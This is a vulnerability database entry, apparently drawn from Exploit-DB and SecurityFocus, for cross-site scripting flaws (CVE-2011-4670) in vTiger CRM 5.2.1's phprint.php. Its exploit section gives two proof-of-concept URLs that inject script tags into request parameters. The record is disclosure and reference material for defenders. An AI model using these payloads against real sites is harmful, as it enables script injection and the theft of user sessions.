ID

VAR-E-201110-0022


CVE

cve_id:CVE-2011-4670

Trust: 1.9

sources: BID: 49927 // EXPLOIT-DB: 36204 // EDBNET: 57561

EDB ID

36204


TITLE

vTiger CRM 5.2.1 - 'PHPrint.php' Multiple Cross-Site Scripting Vulnerabilities - PHP webapps Exploit

Trust: 0.6

sources: EXPLOIT-DB: 36204

DESCRIPTION

vTiger CRM 5.2.1 - 'PHPrint.php' Multiple Cross-Site Scripting Vulnerabilities. CVE-2011-4670CVE-76006 . webapps exploit for PHP platform

Trust: 0.6

sources: EXPLOIT-DB: 36204

AFFECTED PRODUCTS

vendor:vtigermodel:crmscope:eqversion:5.2.1

Trust: 1.3

sources: BID: 49927 // EXPLOIT-DB: 36204

EXPLOIT

source: https://www.securityfocus.com/bid/49927/info

vtiger CRM is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.

An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.

vtiger CRM 5.2.1 is vulnerable; other versions may also be affected.

/phprint.php?module=Home&action=--><script>alert(/xss/)</script>&parenttab=MyHome Page"><script>alert(0)</script>&jt=

/phprint.php?module=--><script>alert(/xss/)</script>&action=index&parenttab=My%20Home%20Page&jt=

Trust: 1.0

sources: EXPLOIT-DB: 36204

EXPLOIT LANGUAGE

txt

Trust: 0.6

sources: EXPLOIT-DB: 36204

PRICE

free

Trust: 0.6

sources: EXPLOIT-DB: 36204

TYPE

'PHPrint.php' Multiple Cross-Site Scripting Vulnerabilities

Trust: 1.0

sources: EXPLOIT-DB: 36204

CREDITS

Aung Khant

Trust: 0.6

sources: EXPLOIT-DB: 36204

EXTERNAL IDS

db:NVDid:CVE-2011-4670

Trust: 1.9

db:EXPLOIT-DBid:36204

Trust: 1.9

db:BIDid:49927

Trust: 1.9

db:EDBNETid:57561

Trust: 0.6

sources: BID: 49927 // EXPLOIT-DB: 36204 // EDBNET: 57561

REFERENCES

url:https://nvd.nist.gov/vuln/detail/cve-2011-4670

Trust: 1.6

url:https://www.securityfocus.com/bid/49927/info

Trust: 1.0

url:https://www.exploit-db.com/exploits/36204/

Trust: 0.6

url:https://www.exploit-db.com/exploits/36203

Trust: 0.3

url:https://www.exploit-db.com/exploits/36204

Trust: 0.3

url:http://seclists.org/fulldisclosure/2011/oct/154

Trust: 0.3

sources: BID: 49927 // EXPLOIT-DB: 36204 // EDBNET: 57561

SOURCES

db:BIDid:49927
db:EXPLOIT-DBid:36204
db:EDBNETid:57561

LAST UPDATE DATE

2022-07-27T09:30:28.118000+00:00


SOURCES UPDATE DATE

db:BIDid:49927date:2011-12-06T19:37:00

SOURCES RELEASE DATE

db:BIDid:49927date:2011-10-04T00:00:00
db:EXPLOIT-DBid:36204date:2011-10-04T00:00:00
db:EDBNETid:57561date:2011-10-04T00:00:00